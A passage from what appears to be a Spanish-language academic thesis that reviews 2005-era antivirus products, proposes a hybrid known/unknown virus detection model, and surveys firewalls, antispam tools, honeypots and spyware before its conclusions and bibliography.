Panda es posiblemente el programa antivirus de mayor difusión en España, hecho
perfectamente lógico, si se considera que es una empresa española, con una
estructura comercial grande y con un servicio técnico en español (Contreras,
2005)14.

Panda es uno de los programas más completos y que ha obtenido mejores

resultados en esta comparación. El porcentaje de virus detectados fue el segundo
más elevado, justo después del Norton Antivirus, y el número de falsos positivos
fue el menor.

Llama la atención la presentación del producto, con más manuales muy bien
editados y con mucha más información que el resto. Así, el usuario no depende
tanto de una conexión a Internet para obtener ayuda, que por cierto es muy
extensa y clara y, además, en el mismo paquete incluye una breve documentación
de todos los virus que se conocen.

Evidentemente, para realizar actualizaciones del programa, es necesario

conectarse a Internet, aunque también existe un servicio de actualizaciones por
CD.

Panda también comercializa otros productos relacionados con Platinum 6.0, como
el Seguro Antivirus Global, para Exchange, Lotus Notes, Firewall y proxy.

Cuando se instala el programa, la opción de análisis heurístico queda

deshabilitada. Esto es un poco contradictorio, porque un usuario novato la
mantendrá así indefinidamente y el programa no será capaz de ofrecer su máximo
potencial de análisis.

La integración con Outlook es buena, así como con el software de transferencia

de ficheros. El usuario puede configurar el producto para analizar los ficheros
según se descarguen de Internet. De esta forma, ningún fichero se quedará en el
disco duro sin analizarse.

Dentro de un único programa principal, puede seleccionarse la opción de

planificación de actividades. En esta opción, puede indicarse cómo se desea que
se realicen las actualizaciones del programa, o bien cuándo se quiere que se
proceda con los análisis. En los materiales utilizados para el manual y las fichas
técnicas incluye un par de disquetes de emergencia, y el sistema de ayuda es
mucho más extenso que el de otros antivirus estudiados.

8.5.6 F-Secure. Es el detector por excelencia, es el único producto que integra

varios motores antivirus de forma paralela, AVP y F-Prot, ambos de reconocido
prestigio. Junto con el software, el usuario recibe tres meses de soporte técnico,
actualizaciones de firmas vía Internet, y acceso al laboratorio para el envío y
solución ante virus nuevos (Hispasec, 2005)33.

118
La interfaz de F-Secure se mantiene con respecto a años anteriores, basada en
tareas predefinidas y en la posibilidad de añadir o editar nuevos trabajos de
análisis, ello permite una distribución y gestión centralizada, especialmente útil
para redes corporativas.

Una vez más, como es habitual, F-Secure obtuvo los mayores resultados en las
pruebas de detección, fruto de sumar la potencia de AVP y F-Prot en sus análisis.
Se ha apreciado una mejora en la velocidad a la hora de escanear grandes
colecciones de virus, donde en comparaciones pasadas era particularmente lento.
En el apartado de compresión recoge los frutos del motor de AVP que incorpora.
No ha destacado en ninguna de las pruebas de soporte, no contempla la potencia
heurística que llega a demostrar AVP en su producto, y llama la atención la
ausencia de un módulo específico para Internet que hace que caiga en los
resultados de este apartado.

Por ahora, sólo se ha traducido al idioma español el procedimiento de instalación

del producto. Los manuales y la página web también se encuentran en inglés.

F-Secure es un antivirus con una gran experiencia. La nueva versión se ha

simplificado sensiblemente en cuanto a la interfaz de usuario, pero ahora resulta
poco intuitiva. Para encontrar la manera de configurar el producto no hay que
acudir al menú de Inicio de Windows, sino que es necesario seleccionar el icono
que se encuentra en la esquina derecha de la barra de tareas, y a continuación
pinchar en el botón de propiedades (Contreras, 2005)14.

En F-Secure, la interfaz de usuario es excesivamente simple. No incluye un panel

de control. Desde el menú de inicio de Windows sólo pueden iniciarse los análisis
del disco, de disquete o de un determinado directorio. Una vez comenzado el
análisis, el usuario debe tomar una decisión sobre cada uno de los virus que
encuentre. No puede seleccionarse una opción para continuar hasta el final sin
arreglar los problemas, por que, si se escoge Cancelar, se detiene el proceso de
análisis.

Desde las opciones, pueden seleccionarse los métodos de análisis a utilizar. Se

combinaron distintas opciones y, aun así, se obtuvo un resultado algo inferior al
resto de los programas analizados en el estudio. No obstante, el resultado es
óptimo, y por eso es un producto certificado por ICSA, que asegura que es capaz
de detectar más de un 95% de los virus de la Wild List.

El costo final del programa es algo elevado. Si se compara con el resto, puede
llegar a valer el doble de cualquier otro sistema antivirus. El soporte y la
actualización de producto son muy buenos. Para actualizarlo, es necesario
conectarse a Internet (Montesino, 2005)44.

119
8.5.7 PC-cillin. Es la solución para estaciones de trabajo Windows que propone
Trend Micro, una multinacional conocida por la calidad de sus soluciones antivirus
en el terreno de los servidores, toda una garantía para los usuarios domésticos.
Junto con el software, el usuario accede al servicio de actualizaciones de
patrones de virus y motor antivirus, puede inscribirse en un servicio de noticias
sobre virus junto con un calendario mediante un Active Desktop que le
mantendrá informado en todo momento.

El interfaz de PC-Cillin es similar a Outlook en su concepción, con una barra de

botones vertical que permite acceder a las distintas opciones. Se destaca la
posibilidad de poder enviar muestras sospechosas a partir de la misma aplicación
y un módulo para revisar el correo entrante. En las pruebas de detección PC-
Cillin ha obtenido buenos resultados, como era de esperar en un producto que
utiliza las bases de firmas de Trend Micro.

Sin embargo, el resultado en el resto de pruebas fue discreto; quedó en los últimos
lugares en la prueba de instalación en un sistema infectado, no consiguió detectar
la muestra en el apartado de heurística, y se detectaron algunos problemas en el
módulo de análisis por Internet, en especial cuando se realiza a través de un
proxy por puertos no estándares (Hispasec, 2005)33.

Lo primero que llama la atención de este producto es la cantidad de versiones

para distintos entornos incluidas en el mismo CD. Ofrece versiones para Solaris,
Windows NT, Lotus Notes, Exchange, etc. Es un producto multiplataforma.

También dispone de diversos programas dentro de los CD de instalación. Por un

lado, se instala el antivirus PC-Cillin, pero además se encuentran productos como
ServerProtect, InterScan WebManager, ScanMail e InterScan VirusWall.
Todos ellos ofrecen una solución conjunta para la seguridad de la red.

Después de realizar las pruebas, se obtuvo una respuesta alta en lo relativo al

número de virus detectados. De la misma manera, el número de falsos positivos
fue bastante bajo, y, en general, obtuvo una buena valoración en cuanto a
fiabilidad (Contreras, 2005)14.

La interfaz de usuario es muy amigable. Se parece un poco a Outlook, en cuanto

al sistema de menús de la izquierda de la ventana, al presentar una barra de
iconos grandes y distintas lengüetas para seleccionar las opciones.

El producto se integra muy bien con el cliente de correo. Después de la

instalación, se activa la opción de análisis de los POP3 del equipo, por lo que se
analizará todo mensaje que llegue a partir de ese momento, sin importar el cliente
de correo que se emplee. En la versión de Exchange, la integración es todavía
mayor, porque se analizan los archivos adjuntos a los mensajes antes de que los
reciba el usuario.

120
Por otra parte, el Virus Wall es capaz de analizar en tiempo real el tráfico SMTP y
FTP para buscar virus. Evidentemente, este análisis debe combinarse con el
análisis heurístico durante el rastreo de un posible virus, pero, para entonces, no
será necesario el análisis de patrones. PC-Cillin es un producto a considerar
cuando conviven equipos UNIX y Windows 2000 dentro de una empresa
(Montesino, 2005)44.

8.5.8 AVP. Fabricado por Kaspersky Lab, el AVP, de origen ruso, es uno de
los productos más apreciados entre los entendidos por la potencia de su motor
antivirus en lo que toca a detección y desinfección. Junto con el software, se
obtiene soporte técnico por correo electrónico y actualizaciones diarias de las
bases de virus durante un año. AVP se destaca por presentar una de las
interfaces más sencillas y prácticas. A su ya conocida potencia como motor
antivirus, se suman unos resultados excelentes a nivel de soporte, al ser el
primero en aportar una solución para una infección por virus, así como ganar en la
contestación a una consulta realizada mediante el correo, en ambos casos con
tiempos de respuesta sorprendentes. Su peor resultado fue en el indicador de
asistencia telefónica (Hispasec, 2005)33.

En el apartado técnico, AVP volvió a obtener buenos resultados en las pruebas de

detección, tal y como ocurrió en comparaciones pasadas. Fue, junto con Norman,
el primero en resolver con éxito la instalación en un sistema infectado. Su
heurística también se ha mostrado acertada las veces que se ha puesto a prueba,
y su dominio en el apartado de soporte de formatos de compresión es absoluto,
muy por encima del resto en la prueba de compresores de ejecutables. Su
sencillez y potencia tiene en contra un punto débil que este año quedó
demostrada: la ausencia de módulos específicos para analizar las vías de entrada
desde Internet, con el agravante de su conflicto con Outlook Express (Montesino,
2005)44.

8.6 FUTURO DE LOS SISTEMAS ANTIVIRUS

8.6.1 Estado del arte de los antivirus como justificación para la creación de
un modelo híbrido. La protección ofrecida por un producto antivirus típico es
estática, lo que significa que la filosofía tras el producto es detectar y (algunas
veces) eliminar virus que los creadores del antivirus ya conocen. Sin embargo,
como se demostró claramente con la explosión de las infecciones de Melissa,
este método tiene su riesgo: mientras los computadores están cada vez más
interconectados, aumenta la capacidad para expandirse de los virus que se
propagan mas rápido que los procesos de detección y remoción. Con este
propósito muchos vendedores de antivirus han adicionado la característica de
detección de virus “desconocidos” a sus productos. Hay muchas sub-clases de
esta detección de virus genérica, cada una con sus fortalezas y debilidades. Sin
embargo, algunos aspectos son universalmente ciertos:

121
La detección de virus conocidos es mas confiable cuando se trata con virus ya
conocidos. Por lo tanto, no es muy probable que las técnicas genéricas
reemplacen a los scanners basados en características específicas del agente de
infección.

Las técnicas genéricas no deben marcar como infectados archivos que están
“limpios”. Tal confusión (conocida como falsos positivos) puede darle tanto trabajo
al usuario como una infección real, dado que la muestra debe ser capturada y
enviada al distribuidor de antivirus. El vendedor debe entonces explícitamente
excluir el archivo de la detección, o cambiar el sistema entero de detección para
que ese archivo (y archivos similares) no sean marcados por error. Se puede
concluir entonces que las técnicas genéricas son más efectivas como
complemento y no como reemplazo de las técnicas tradicionales.

El próximo paso en la evolución de los productos antivirus seria un acoplamiento

entre las técnicas genéricas y las específicas (o tradicionales). Cuando un nuevo
virus es descubierto en The Wild, el virus es identificado y capturado
genéricamente y la detección de virus conocidos se adiciona automáticamente
para proveer inmunidad para ese virus a nivel mundial. Un producto de este tipo
no es ni genérico ni específico, es un híbrido, que permite no solo la
implementación de ambas técnicas sino también la integración de las estrategias
de detección genéricas y específicas.

De acuerdo a varias simulaciones realizadas este tipo de técnica reduciría

dramáticamente la oportunidad de una infección de virus de alcanzar proporciones
epidémicas, porque a las otras máquinas en el resto del mundo se les daría
inmunidad tan pronto el virus fuera detectado en una. Sin embargo, como los
computadores pueden intercambiar datos extremadamente rápido, este proceso
necesita volverse mucho más frecuente y automatizado.

Por lo tanto, la próxima generación de productos antivirus debe ser capaz de tratar
con los virus conocidos y desconocidos que lleguen a determinado host. El virus
debe ser detectado de alguna manera y cuando sea posible y deseable, ser
curado. Además cualquier otro computador que encuentre el mismo virus debe
ser capaz de identificar el virus inmediata y exactamente.

8.6.2 Modelo Hibrido. Estos son los componentes que el sistema hibrido
propuesto debe tener:

Habilidad para detectar virus desconocidos: Mientras que un antivirus diseñado

para los desafíos del futuro compartirá similitudes con los sistemas actuales,
también habrá diferencias importantes. El sistema debe, por supuesto, primero
que todo inicialmente encontrar el virus.

122
Con ese fin, el software que tiene una combinación de técnicas de detección de
virus debe presentarse en el equipo del usuario. Como mínimo estos deben
consistir de uno o más de los siguientes:

Heurística basada en una muestra

Simulación de código
Técnicas Post-infección, como el checksumming

Generación de inmunidad Una vez que un nuevo virus es encontrado o si la

cura no está disponible, el sistema debe ofrecer procesos seguros y
personalizables para proveer la cura. Mientras que hay muchas metodologías
posibles para alcanzar este resultado, la arquitectura más posible de este tipo de
sistema es que cuando se encuentra un virus nuevo, una cura es derivada, y un
sistema de distribución central envía esta cura alrededor del mundo,
proporcionando inmunidad a otros equipos, aun aquellos que no han sido
infectados con el virus.

Algunos vendedores de antivirus pueden afirmar que este proceso no es

necesario, después de todo, la heurística detectó el virus sin necesidad de tener
ninguna inmunidad, desafortunadamente esto es falso, como se ilustra a
continuación. Ciertas técnicas heurísticas (como los monitores de comportamiento
y los verificadores de integridad) funcionan post-infección, a diferencia de la
detección de virus conocidos que ocurre antes que un virus tenga la oportunidad
de infectar un equipo.

Es claro que aun si el virus es detectado por una heurística post-infección, el

equipo ha tenido la posibilidad de ser dañado por cualquier virus que se haya
podido implementar. Por lo tanto es mucho mejor proveer detección pre-infección,
y permitir a otros usuarios el acceso a técnicas de detección de virus conocidos
antes de encontrarse con el virus, eliminando cualquier daño post-infección.

Ninguna heurística que opere pre-infección es perfecta, por lo tanto en el caso de

un virus polimórfico, es muy posible que un virus pueda ser detectado
genéricamente en algunas muestras y no en otras. Otra razón para no confiar
mucho en la detección heurística es que por su misma naturaleza es muy
dinámica.

Una situación típica con el rango actual de productos es que una nueva muestra
pueda ser detectada por la heurística de un producto. Actualizaciones
subsecuentes del producto le proveen al scanner una marca con la que puede
identificar el mismo virus. Por lo tanto, de alguna forma es de naturaleza transitiva.
Debe considerarse también un producto cuya detección heurística lleve a un falso
positivo—una actualización de la heurística puede llevar a que la heurística en un
nuevo producto no tenga virus que ya fueron detectados.

123
La detección pre-infección es también importante cuando se consideran algunos
de los virus de infección de archivos más complejos, especialmente aquellos que
específicamente infectan archivos ejecutables portátiles de Windows. La
desinfección de los archivos infectados con este tipo de virus es una cuestión
compleja. Aparte del hecho que algunos virus se caracterizan por corromper
archivos en el momento de la infección, hay muy poca seguridad en confiar en una
desinfección de un producto antivirus para que restaure este tipo de archivos
exactamente.

Velocidad de respuesta: Uno de los principales beneficios de sintetizar la

detección de virus conocidos y desconocidos es la inmunidad, es importante que
cualquier sistema híbrido sea capaz de de responder a tiempo ante muchos
nuevos virus.

La habilidad de llegar a un gran número de transacciones es importante,

específicamente, la funcionalidad del producto debe permitir la habilidad de
proveer actualizaciones literalmente instantáneas; esto puede requerir un diseño
de red jerárquico, con nodos globalmente distribuidos que actúen como sistemas
gateway a centros de análisis potencialmente múltiples.

Robustez: Especular sobre los problemas potenciales con la robustez de un

sistema híbrido es difícil sin proponer una arquitectura específica detallada. Sin
embargo, hay algunas líneas genéricas de ataque que parecen las más posibles.

Hay varias capas de un sistema autómata que podrían se atacadas por un virus,
empleando una de varias técnicas diferentes. Primero, el sistema puede ser
atacado directamente por un virus. En este tipo de ataque, el autor del virus
intentaría derrotar al sistema en el lado del cliente, desarrollando virus que evadan
técnicas heurísticas de detección de virus, o simplemente deshabilitando
totalmente al cliente. Aunque estos efectos son importantes para predecir y tomar
medidas para prevenir, no son nada nuevo; es de notar aquí un ataque masivo a
un sistema híbrido. En el caso de un sistema híbrido que emplee clientes
inteligentes que envíen información a un hub central para su distribución, la forma
más posible de ataque sería una característica de de impacto directo.

Seguridad, disponibilidad y facilidad de uso: Cualquier proceso que requiera el

envío de muestras o fragmentos debe ser seguro en el sentido clásico de
seguridad; esto significa que no debe violar la confidencialidad, disponibilidad e
integridad de la información que maneja. Además, otro aspecto importante del
sistema es la facilidad de uso; aun si la tecnología esta en posición de proveer
automatización de la captura de muestras, análisis y generación de inmunidad, si
el sistema no es fácil de configurar, no alcanzará esta meta.

124
 9. PROGRAMAS DE SEGURIDAD

9.1 SOFTWARE DE SEGURIDAD

La seguridad ha sido el principal concerniente a tratar cuando una organización

desea conectar su red privada al Internet. Sin tomar en cuenta el tipo de negocios,
se ha incrementado el numero de usuarios de redes privadas por la demanda del
acceso a los servicios de Internet tal es el caso del World Wide Web (WWW),
Internet Mail (e-mail), Telnet, y File Transfer Protocol (FTP). Adicionalmente los
corporativos buscan las ventajas que ofrecen las paginas en el WWW y los
servidores FTP de acceso publico en el Internet.

Los administradores de red tienen que incrementar todo lo concerniente a la

seguridad de sus sistemas, debido a que se expone la organización privada de
sus datos así como la infraestructura de sus red a los Expertos de Internet
(Internet Crakers). Para superar estos temores y proveer el nivel de protección
requerida, la organización necesita seguir una política de seguridad para prevenir
el acceso no-autorizado de usuarios a los recursos propios de la red privada, y
protegerse contra la exportación privada de información. Todavía, aun si una
organización no esta conectada al Internet, esta debería establecer una política de
seguridad interna para administrar el acceso de usuarios a porciones de red y
proteger sensitivamente la información secreta.

9.2 SOFTWARE ANTISPAM

Cada día una cantidad descomunal de mensajes no solicitados inunda las casillas
de correo electrónico y pone en peligro a una herramienta que ya es vital para
millones de personas en todo el mundo. Mientras los distintos gobiernos se
deciden a adoptar medidas legales y la industria del software antispam da sus
primeros pasos, los usuarios desprevenidos tienen que hurgar entre montañas de
correo basura para encontrar un mensaje genuino.

En un principio, recibir de forma esporádica en nuestra casilla de correo

electrónico publicidades no solicitadas sobre páginas eróticas, préstamos a tasas
irrisorias o recetas para hacerse rico puede no molestar, o hasta parecernos
gracioso o anecdótico. Pero cuando el crecimiento en el volumen de estos
mensajes se vuelve incontrolable, el 'correo basura' -o spam en inglés- se
transforma en una amenaza para el funcionamiento del correo electrónico,
herramienta indispensable para millones de personas en todo el mundo.

125
9.3 SOFTWARE ANTISPAM COMO HERRAMIENTA EN LA LUCHA CONTRA
EL SPAM

Las medidas para combatir el Spam se desarrollan en tres ámbitos diferentes. Por
un lado, los distintos gobiernos están encarando el problema de brindar un marco
legal para contener el Spam. En el plano tecnológico, la industria del software
está desarrollando distintas herramientas para filtrar el correo basura. En el ámbito
del usuario, por último, hay distintas medidas que pueden ayudar a combatir o
reducir el ingreso de correo basura.

Existen diversas herramientas tecnológicas para combatir el spam. La mayoría de

estos programas combinan las 'listas blancas' y 'listas negras' para filtrar los
mensajes, con otras funcionalidades. Estos son algunos de ellos:

SpamNet: permite a los usuarios de Outlook que toda vez que un usuario indica
como spam a un determinado mensaje, esa información sea enviada a las bases
de datos de Cloudmark. Una vez que una determinada cantidad de usuarios
identifican a una dirección de mail como Spammer, ésta pasa a formar parte de
una lista negra con información compartida por todos los usuarios del programa.

MailWasher: además de verificar que el mail del remitente no esté catalogado

como Spammer en alguna lista, permite enviar automáticamente al remitente un
mensaje falso indicando que la casilla de correo destino no existe.

Matador: Filtra por listas blancas y negras y verificar la procedencia de los

mensajes, cuenta con un sistema denominado Desafío: cuando el usuario recibe
un mensaje desde una dirección desconocida – que no está en la lista blanca –
Matador responde al remitente del mensaje con un desafío muy simple, como
ingresar el número que aparece en una imagen.

Si el remitente es un equipo de spam automático no pasará la prueba y el usuario

nunca recibirá el mensaje basura (Bancorio, 2005)7.

Un Firewall en Internet es un sistema o grupo de sistemas que impone una

política de seguridad entre la organización de red privada y el Internet. El firewall
determina cual de los servicios de red pueden ser accesados dentro de esta por
los que están fuera, es decir quien puede entrar para utilizar los recursos de red
pertenecientes a la organización. Para que un firewall sea efectivo, todo trafico
de información a través del Internet deberá pasar a través del mismo donde podrá
ser inspeccionada la información. El firewall podrá únicamente autorizar el paso
del trafico, y el mismo podrá ser inmune a la penetración. desafortunadamente,
este sistema no puede ofrecer protección alguna una vez que el agresor lo
traspasa o permanece entorno a este (Figura 7).

126
Figura 7. Ubicación de un Firewall

Los Firewalls en Internet administran los accesos posibles del Internet a la red
privada. Sin un firewall, cada uno de los servidores propios del sistema se
exponen al ataque de otros servidores en el Internet. Esto significa que la
seguridad en la red privada depende de la “Dureza” con que cada uno de los
servidores cuenta y es únicamente seguro tanto como la seguridad en la fragilidad
posible del sistema. El firewall permite al administrador de la red definir un “choke
point” (envudo), manteniendo al margen los usuarios no-autorizados (tal, como.,
hackers, crakers, vándalos, y espías) fuera de la red, prohibiendo potencialmente
la entrada o salida al vulnerar los servicios de la red, y proporcionar la protección
para varios tipos de ataques posibles. Uno de los beneficios clave de un firewall
en Internet es que ayuda a simplificar los trabajos de administración, una vez que
se consolida la seguridad en el sistema firewall, es mejor que distribuirla en cada
uno de los servidores que integran nuestra red privada.

El Firewall ofrece un punto donde la seguridad puede ser monitoreada y si

aparece alguna actividad sospechosa, este generara una alarma ante la
posibilidad de que ocurra un ataque, o suceda algún problema en el transito de los
datos. Esto se podrá notar al acceder la organización al Internet, pero cuando
ocurrirá el ataque es incierto. Esto es extremadamente importante para que el
administrador audite y lleve una bitácora del tráfico significativo a través del
Firewall. También, si el administrador de la red toma el tiempo para responder
una alarma y examina regularmente los registros de base. Esto es innecesario
para el Firewall, porque que el administrador de red desconoce si ha sido
exitosamente atacado.

127
9.4 LIMITACIONES DE UN FIREWALL

Un Firewall no puede protegerse contra aquellos ataques que se efectúen fuera

de su punto de operación. Por ejemplo, si existe una conexión dial-out sin
restricciones que permita entrar a nuestra red protegida, el usuario puede hacer
una conexión SLIP o PPP al Internet. Podría ser incómodo para algunos usuarios
cuando se solicita una autenticación adicional requerida por un Firewall Proxy
server (FPS) lo cual puede ser provocado por un sistema de seguridad
circunvecino que está incluido en una conexión directa SLIP o PPP del ISP.

Este tipo de conexiones derivan la seguridad provista por Firewall construido

cuidadosamente, creando una puerta de ataque. Los usuarios pueden estar
consientes de que este tipo de conexiones no son permitidas como parte integral
de la arquitectura de la seguridad en la organización.

9.5 HONEYPOTS Y HONEYNETS

Un Honeypot es un sistema diseñado para analizar cómo los intrusos emplean

sus armas para intentar entrar en un sistema (analizan las vulnerabilidades) y
alterar, copiar o destruir sus datos o la totalidad de éstos (por ejemplo borrando el
disco duro del servidor). Por medio del aprendizaje de sus herramientas y métodos
se puede, entonces, proteger mejor los sistemas. Pueden constar de diferentes
aplicaciones, una de ellas sirve para capturar al intruso o aprender cómo actúan
sin que ellos sepan que están siendo vigilados.

También existe el Honeynet, que es un conjunto de Honeypots, así abarca más

información para su estudio. Incluso hace más fascinante el ataque al intruso, lo
cual incrementa el número de ataques. La función principal a parte de la de
estudiar las herramientas de ataque, es la de desviar la atención del atacante de la
red real del sistema y la de capturar nuevos virus o gusanos para su posterior
estudio. Una de las múltiples aplicaciones que tiene es la de poder formar perfiles
de atacantes y ataques.

Son sistemas que deliberadamente se decide exponerlos a ser atacados o

comprometidos. Estos, no solucionan ningún problema de seguridad, son una
herramienta que nos sirve para conocer las estrategias que se emplean a la hora
de vulnerar un sistema. Son una herramienta muy útil a la hora de conocer de
forma precisa los ataques que se realizan contra la plataforma de trabajo que
hemos elegido, o bien, las plataformas configuradas de la misma forma, y que
sirven para guardar todos los procesos que se están ejecutando contra o en
nuestro sistema con el claro objetivo de acceder a información sensible para una
organización, empresa o corporativo. Así mismo nos permiten conocer nuevas
vulnerabilidades y riesgos de los distintos sistemas operativos y diversos entornos
y programas, las cuales aún no se encuentren debidamente documentadas
(Virusprot, 2005)57.

128
Los Firewalls (sistemas o combinación de sistemas que fijan los límites entre dos
o más redes y restringen la entrada y salida de la información) son parte esencial
de cualquier solución de seguridad en redes y para proporcionar la máxima
protección contra ataques, a la vez que permiten soportar aplicaciones
innovadoras, es importante que estos equipos actúen como parte de todo un
sistema integral de seguridad. En definitiva, un firewall (barrera de protección o
procedimiento de seguridad que coloca un sistema de cómputo programado
especialmente entre una red segura y una red insegura, pudiendo ser ésta última
Internet pues es considerada siempre una zona peligrosa) es un complemento al
resto de medidas corporativas que se han de tomar para garantizar la protección
de la información y que han de contemplar no solo los ataques externos, sino
también los internos, que puede realizar el propio personal, así como todas
aquellas aplicaciones que están instaladas y que pueden tener agujeros o huecos
significativos por los que se puedan colar los intrusos.

En seguridad toda medida es poca y hay que estar innovando continuamente

(actualizando políticas y medios para afinar los recursos de seguridad) para no
dejar huecos por donde puedan colarse los intrusos, pero como esto no siempre
es evitable (la seguridad absoluta en la práctica no existe, podemos siempre irnos
aproximando a ella, pero como concepto constituye un objetivo irrealizable), es
como de manera obligada o natural se abre paso a todo un universo de técnicas
más elaboradas e incluso ingeniosas, como es facilitar la entrada a la red pero por
caminos falsos que no conducen a nada concreto o esperable para un posible
atacante y que permiten al responsable de la seguridad del sistema detectar los
intentos de intrusión, con lo que se está sobre aviso y es más fácil protegerse.

A estas técnicas se les conoce como “Honeypots” o tarros de miel (y se usan

para conseguir literalmente que los intrusos, atacantes o saboteadores “se
engolosinen” y crean que en realidad están vulnerando todo y durante este
proceso se puedan tomar medidas verdaderamente preventivas), y consisten en
instalar servidores de red (comúnmente UNIX o NT) específicamente para atraer
la atención actuando como trampas, consiguiendo registrar movimientos y
alertando a los administradores de la red de que se está produciendo un intento de
violación, con lo cual hay tiempo de reacción para parar el ataque y obtener los
datos del posible intruso. Simulan ser un elemento real de red, pero están
desactivados para que no se pueda tomar su control desde el exterior, se
encuentran en una zona al margen del tráfico convencional y disponen de un
auténtico filtro dedicado para evitar todo el tráfico saliente en caso de que fallen o
un experto (un verdadero hacker y no un atacante furtivo o novato, o un auténtico
especialista formado en estos temas) consiga acercarse lo suficiente como para
intentar tomar su control (Virusprot, 2005)57.

De hecho, cuando se piensa en seguridad para las redes se piensa en routers

(controladores de tráfico en las redes), Firewalls y en Sistemas de Detección de
Intrusos (éstos forman parte del modelo de seguridad adoptado por una

129
organización o empresa, sirven para detectar actividades inapropiadas, incorrectas
o anómalas desde el exterior o interior de todo un sistema informático). En este
contexto es como se nos presentan los Honeypots como alternativa -además de
adicional- bastante útil como una medida eficaz que nos permita afinar nuestros
criterios de seguridad corporativa e incluso con el tiempo poder ir contribuyendo a
la evolución y desarrollo de estándares internacionales de seguridad.

En la actualidad ya se empiezan a tener investigaciones serias en este sentido

(Honeynet Project), los honeypots hasta el momento solamente son algo
experimental y con fines de estudio. Recalcamos también que, no podemos ser
por el momento demasiado optimistas, uno de los tantos estudios –de acuerdo con
Cristian Fabián A.S.S. Borghello- revela como a “un intruso le tomó menos de un
minuto irrumpir en la computadora de la universidad, estuvo dentro menos de
media hora y a los investigadores les tomó 34 horas descubrir todo lo que hizo” y,
también se estima que “esas 34 horas de limpieza pueden costar 2.000 dólares a
una organización y 22.000 si se debiera tratar con un consultor especializado.”
(Virusprot, 2005)57.

9.6 SOFTWARE ANTISPY

Se llama Spyware a los programas diseñados para espiar el comportamiento de

los usuarios, fundamentalmente cuando se encuentran conectados a Internet.

Los programas que rastrean la información sobre hábitos de consumo y

navegación de los internautas pueden realizar muchas actividades de manera
sigilosa, sin que nadie lo advierta.

Con intervalos de tiempo programables, el programa se conecta a través de

Internet con un servidor de la compañía que lo distribuyó y transmite
diligentemente toda la información que ha recopilado.

Utilizan sistemas de camuflaje casi perfectos. Se suelen instalar en la PC junto

con algún tipo de aplicación (un cliente de P2P, alguna utilidad para el disco rígido,
etc.).

Los nombres de los archivos que corresponden con estos programas no suelen
dar una idea de su verdadera naturaleza, por lo que pueden pasar desapercibidos
entre otros archivos de una aplicación.

No provocan ningún efecto visible en el ordenador, ni cuando son instalados, ni

cuando se encuentran en plena acción. Por ello, precisamente, los usuarios no
suelen preocuparse de si algún programa de este tipo se encuentra instalado en
su sistema. No se trata de un virus, por lo cual los programas antivirus no los
detectan. Por tal motivo, para detectar Spyware es necesario utilizar aplicaciones
específicas.

130
 10. CONCLUSIONES

• Con la información recopilada de numerosas fuentes sobre la historia de los

virus y el conocimiento obtenido analizando el comportamiento de los virus en
la actualidad, no es exagerado afirmar que no importa lo mucho que avance la
tecnología los virus se mantendrán a la par. En el futuro los dispositivos
electrónicos van a hacer parte de la vida diaria del hombre promedio, este tipo
de tecnología puede también llegar a ser blanco de los códigos nocivos.

• El punto más vulnerable para la seguridad de los equipos lo constituyen los

propios usuarios, dado que por curiosidad y falta de conocimiento o ignorancia
activan y ayudan a la propagación de códigos nocivos que causan grandes
daños a la información.

• La función de los programas antivirus que existen en la actualidad no

proporciona un 100% de protección para todos los virus existentes, sin
embargo es una industria en constante evolución, es necesario aclarar que un
porcentaje considerable de la efectividad del antivirus depende del usuario.

• La tarea principal de un antivirus es detectar y detener un virus que ha

infectado un equipo y tomar las medidas necesarias

• En la actualidad se emplean dos métodos para detección de virus, el scanning

usa fragmentos de código de virus ya conocidos (que han estado ahí afuera “In
the wild” infectando equipos) para identificar posibles infecciones, la técnica
heurística ofrece una solución un poco más rápida que busca señales o
patrones de comportamiento típicos de un virus. Ambas técnicas presentan
serias desventajas siendo tiempo la más notoria de la técnica de scanning y
falta de confiabilidad (dadas las muchas falsas alarmas potenciales) la falla
más prominente de la técnica heurística.

• En este proyecto se reúne documentación que proyecta el futuro de los

antivirus en la forma de un modelo híbrido que no solo implemente ambas, la
detección de virus conocidos y no conocidos, sino que también las acople de
una forma que se complementen la una a la otra para brindar una mayor
protección al usuario final.

• Los usuarios no solo son victimas de los creadores de código nocivo, existen
otras formas de software “indeseable” con las que tienen que tratar a diario, se
presentan como el ejemplo más obvio el spyware y el spam que son el
resultado del afán de las grandes corporaciones por obtener información sobre
el usuario para actualizar sus bases de datos y ampliar su mercado.

131
• Los sistemas Linux no son blanco frecuente de los ataques con código nocivo
debido a la mayor popularidad que tienen los sistemas Windows, su
contraparte. Dado que el creador de código nocivo busca reconocimiento y
popularidad es lógico que escoja el sistema más usado como blanco de sus
ataques.

• Las herramientas para la creación de virus están al alcance de cualquier

persona que navegue en Internet, y en este proyecto comprobamos(con la
creación de un prototipo de Worm con las características mas primitivas en
Visual Basic) que es bastante sencillo crear un Worm básico que tiene el
potencial de ser mejorado con características de stealth y métodos
sofisticados de propagación. Todas estas rutinas están explicadas en detalle
en la red y su implementación requiere solo un mínimo de conocimiento de
programación.

• Analizando los tipos de virus y sus clasificaciones se puede esperar que sus
técnicas y definiciones sigan multiplicándose, debido a que la naturaleza del
virus creado depende solo de la creatividad de su creador a la hora de
programar diferentes tipos de ataque y nuevas formas de propagación.

• El riesgo de propagación de virus aumenta de forma directamente proporcional

al incremento de la popularidad de programas como el msn Messenger, IRC,
Outlook y programas del tipo P2P (Peer to Peer).

132
 BIBLIOGRAFÍA

1. HERNÁNDEZ HERNÁNDEZ, Arturo. Virus informático. México: Universidad

Nacional Autónoma de México, 2000. 4 p.

2. ________. ________México: Universidad Nacional Autónoma de México, 2000.

8 p.

Otros sitios consultados:

3. Alerta-Virus. ¿Dónde se esconden?. Obtenida en Julio de 2005, de http://alerta-

antivirus.red.es/virus/ver_pag.html?tema=V&articulo=1&pagina=4

4. Alerta-Virus. Faq (Preguntas Frecuentes). Obtenida en Agosto de 2005, de

http://alerta-antivirus.red.es/accesofacil/af-faq.htm#queson

5. Alerta-Virus. Tipos de Virus. Obtenida en Julio de 2005, de

http://alertaantivirus.red.es/virus/ver_pag.html?tema=V&articulo=1&pagina=2

6. ÁLVAREZ MARAÑÓN. Gonzalo. Correo basura. Obtenida en Julio de 2005, de

http://www.iec.csic.es/criptonomicon/spam/

7. Bancorio. La lucha contra el spam: Una guerra en varios frentes. Obtenida en

Octubre de 2005, de http://www.bancorio.com.ar/individuos/rioonline_spam.jsp

8. BLAESS, Christophe. Virus: nos afecta a todos. Obtenida el 28 de Junio de

2005, de
http://es.tldp.org/LinuxFocus/pub/mirror/LinuxFocus/Castellano/September2002/art
icle255.shtml

